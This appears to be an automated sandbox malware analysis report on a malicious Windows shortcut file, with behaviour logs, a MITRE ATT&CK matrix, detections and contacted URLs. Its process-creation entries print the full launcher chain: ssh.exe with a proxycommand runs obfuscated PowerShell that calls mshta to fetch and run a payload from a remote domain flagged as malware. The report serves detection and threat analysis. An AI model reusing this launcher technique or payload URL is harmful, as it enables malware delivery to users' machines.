Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1495Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1866Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1403Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 651Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7496Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 1495 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 1866 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 1403 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 651 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7960Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2680411919.0000025E2B65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2678249284.0000025E25E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2678285013.0000025E25E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClass
Source: ssh.exe, 00000001.00000002.2676527197.000002931A8DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'alc15y7xi6izdmshta https://docu-signer.com/api/uz/0912545164/index.mp4alc15y7xi6izd'.substring(13, 57)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582824 Sample: DypA6KbLrn.lnk Startdate: 31/12/2024 Architecture: WINDOWS Score: 80 26 docu-signer.com 2->26 32 Antivirus detection for URL or domain 2->32 34 Windows shortcut file (LNK) starts blacklisted processes 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 4 other signatures 2->38 9 ssh.exe 2 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 42 Windows shortcut file (LNK) starts blacklisted processes 9->42 15 powershell.exe 7 9->15         started        18 conhost.exe 1 9->18         started        30 127.0.0.1 unknown unknown 12->30 signatures6 process7 signatures8 44 Windows shortcut file (LNK) starts blacklisted processes 15->44 20 powershell.exe 7 15->20         started        process9 signatures10 40 Windows shortcut file (LNK) starts blacklisted processes 20->40 23 mshta.exe 16 20->23         started        process11 dnsIp12 28 docu-signer.com 104.21.87.65, 443, 49706, 49707 CLOUDFLARENETUS United States 23->28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DypA6KbLrn.lnk32%ReversingLabsShortcut.Trojan.Pantera
DypA6KbLrn.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://docu-signer.com/api/uz/0912545164/index.mp4L100%Avira URL Cloudmalware
https://docu-signer.com/W0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/phish-bypassG0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/styles/cf.errors.css$0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/styles/cf.errors.css40%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4C:100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556374gU0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637L0%Avira URL Cloudsafe
https://docu-signer.com/S0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp44100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:p100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/phish-bypasstp4y0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4H100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssD0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4...100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4$global:?100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/styles/cf.errors.css0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/styles/cf.errors.cssL0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/phish-bypassg.mp4T0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4indows100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4p100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4t100%Avira URL Cloudmalware
https://docu-signer.com/api/uz/0912545164/index.mp4q100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637$fE0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4y100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637z0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4x100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637ent(0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/phish-bypass0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4R100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637a0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637fn0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4c100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637m0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...o0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/phish-bypassQ0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...x0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637rg0%Avira URL Cloudsafe
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556370%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/index.mp4f100%Avira URL Cloudmalware
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...u0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
docu-signer.com
104.21.87.65
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://docu-signer.com/api/uz/0912545164/index.mp4true
    • Avira URL Cloud: malware
    		unknown
    https://docu-signer.com/cdn-cgi/styles/cf.errors.cssfalse
    • Avira URL Cloud: safe
    		unknown
    https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://docu-signer.com/api/uz/0912545164/index.mp44mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://docu-signer.com/cdn-cgi/styles/cf.errors.css$mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.cloudflare.com/learning/access-management/phishing-attack/mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://www.cloudflare.com/learning/access-management/phishing-attack/dgmshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://docu-signer.com/cdn-cgi/phish-bypassGmshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.cloudflare.com/learning/access-management/phishing-attack/Tfmshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://docu-signer.com/Smshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/Wmshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/api/uz/0912545164/index.mp4C:mshta.exe, 00000005.00000002.2676736474.00000178AC4E0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637Lmshta.exe, 00000005.00000002.2676736474.00000178AC5B5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/cdn-cgi/styles/cf.errors.css4mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?13767556374gUmshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/api/uz/0912545164/index.mp4Lpowershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:pmshta.exe, 00000005.00000002.2678000406.00000178AC670000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://docu-signer.com/api/uz/0912545164/index.mp4Hmshta.exe, 00000005.00000002.2677825306.00000178AC620000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://docu-signer.com/cdn-cgi/phish-bypasstp4ymshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/cdn-cgi/styles/cf.errors.cssDmshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.mmshta.exe, 00000005.00000002.2681800480.00000180AF285000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://www.cloudflare.com/5xx-error-landingtmshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://docu-signer.com/api/uz/0912545164/index.mp4$global:?powershell.exefalse
            • Avira URL Cloud: malware
            		unknown
            https://docu-signer.com/api/uz/0912545164/index.mp4...mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://www.cloudflare.com/5xx-error-landinghmshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://docu-signer.com/cdn-cgi/styles/cf.errors.cssLmshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://docu-signer.com/cdn-cgi/phish-bypassg.mp4Tmshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://docu-signer.com/api/uz/0912545164/index.mp4indowspowershell.exe, 00000004.00000002.1461122736.000002A8399B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/api/uz/0912545164/index.mp4tmshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/api/uz/0912545164/index.mp4qpowershell.exe, 00000004.00000002.1462221215.000002A83B440000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/api/uz/0912545164/index.mp4ppowershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637$fEmshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
